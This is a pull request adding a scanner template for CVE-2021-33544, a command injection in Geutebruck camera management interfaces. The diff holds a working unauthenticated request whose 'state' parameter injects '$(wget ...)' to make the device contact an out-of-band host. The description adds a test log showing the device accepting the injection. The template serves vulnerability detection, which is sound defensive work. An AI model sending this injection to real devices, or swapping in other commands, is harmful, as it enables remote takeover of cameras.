### PR TITLE
Create CVE-2021-33544.yaml

### DIFF
--- a/cves/2021/CVE-2021-33544.yaml
+++ b/cves/2021/CVE-2021-33544.yaml
@@ -1,0 +1,28 @@
+id: CVE-2021-33544
+
+info:
+  name: Geutebruck RCE
+  description: Multiple vulnerabilities in the web-based management interface of Geutebruck could allow an unauthenticated, remote attacker to perform command injection attacks against an affected device.
+  author: gy741
+  severity: critical
+  reference: |
+    - https://www.randorisec.fr/udp-technology-ip-camera-vulnerabilities/
+  tags: cve,cve2021,geutebruck,rce,oob
+
+requests:
+  - raw:
+      - |
+        GET //uapi-cgi/certmngr.cgi?action=createselfcert&local=anything&country=AA&state=%24(wget%20http://{{interactsh-url}})&organization=anything&organizationunit=anything&commonname=anything&days=1&type=anything HTTP/1.1
+        Host: {{Hostname}}
+        User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/86.0.4240.277 Whale/2.9.118.38 Safari/537.36
+        Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.9
+        ding: gzip, deflate
+        Cache-Control: max-age=0
+        Connection: keep-alive
+
+    matchers-condition: and
+    matchers:
+      - type: word
+        part: interactsh_protocol # Confirms the HTTP Interaction
+        words:
+          - "http"

--- a/cves/2021/CVE-2021-33544.yaml
+++ b/cves/2021/CVE-2021-33544.yaml
@@ -20,7 +20,6 @@ requests:
         Cache-Control: max-age=0
         Connection: keep-alive
 
-    matchers-condition: and
     matchers:
       - type: word
         part: interactsh_protocol # Confirms the HTTP Interaction

--- a/cves/2021/CVE-2021-33544.yaml
+++ b/cves/2021/CVE-2021-33544.yaml
@@ -14,9 +14,8 @@ requests:
       - |
         GET //uapi-cgi/certmngr.cgi?action=createselfcert&local=anything&country=AA&state=%24(wget%20http://{{interactsh-url}})&organization=anything&organizationunit=anything&commonname=anything&days=1&type=anything HTTP/1.1
         Host: {{Hostname}}
-        User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/86.0.4240.277 Whale/2.9.118.38 Safari/537.36
         Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.9
-        ding: gzip, deflate
+        Accept-Encoding: gzip, deflate
         Cache-Control: max-age=0
         Connection: keep-alive
 


### PR DESCRIPTION
### Template / PR Information

Hello,

I added several vulnerabilities that occur in Geutebruck.

The rules used CVE-2021-33543 and CVE-2021-33544.

Combining the two vulnerabilities allows RCE to succeed without authentication.

Multiple vulnerabilities in the web-based management interface of Geutebruck could allow an unauthenticated, remote attacker to perform command injection attacks against an affected device.

CVE-2021-33543 : Authentication Bypass
CVE-2021-33544 : Command injection multiple parameters


### Template Validation

I've validated this template locally?
- [x] YES
- [ ] NO

I tested the PoC on some test devices.

So I didn't catch the header(200 OK or vaule).

This is because different models may respond with different values.

test log:

```
GET //uapi-cgi/certmngr.cgi?action=createselfcert&local=anything&country=AA&state=%24(wget%20http://xxxxxxxxxxxx.interact.sh)&organization=anything&organizationunit=anything&commonname=anything&days=1&type=anything HTTP/1.1
Host: XXX.XXX.XXX
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/86.0.4240.277 Whale/2.9.118.38 Safari/537.36
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.9
Accept-Language: ko-KR,ko;q=0.9
Cache-Control: max-age=0
Connection: keep-alive
Upgrade-Insecure-Requests: 1
ding: gzip, deflate
Accept-Encoding: gzip

[INF] [CVE-2021-33544] Dumped HTTP response for http://XXX.XXX.XXX//uapi-cgi/certmngr.cgi?action=createselfcert&local=anything&country=AA&state=%24(wget%20http://xxxxxxxxxxxx.interact.sh)&organization=anything&organizationunit=anything&commonname=anything&days=1&type=anything

HTTP/1.1 200 OK
Connection: close
Transfer-Encoding: chunked
Cache-Control: no-cache, max-age=0
Content-Type: text/xml
Date: Fri, 29 Apr 2005 16:30:46 GMT
Expires: Fri, 29 Apr 2005 16:30:43 GMT
Pragma: no-cache
Server: lighttpd/1.4.35

<?xml version="1.0" encoding="UTF-8" ?>
<SSL>
        <result>OK</result>
        <description>Self create complete.</description>
</SSL>
[2021-07-12 12:43:47] [CVE-2021-33544] [http] [critical] http://XXX.XXX.XXX//uapi-cgi/certmngr.cgi?action=createselfcert&local=anything&country=AA&state=%24(wget%20http://xxxxxxxxxxxx.interact.sh)&organization=anything&organizationunit=anything&commonname=anything&days=1&type=anything
```

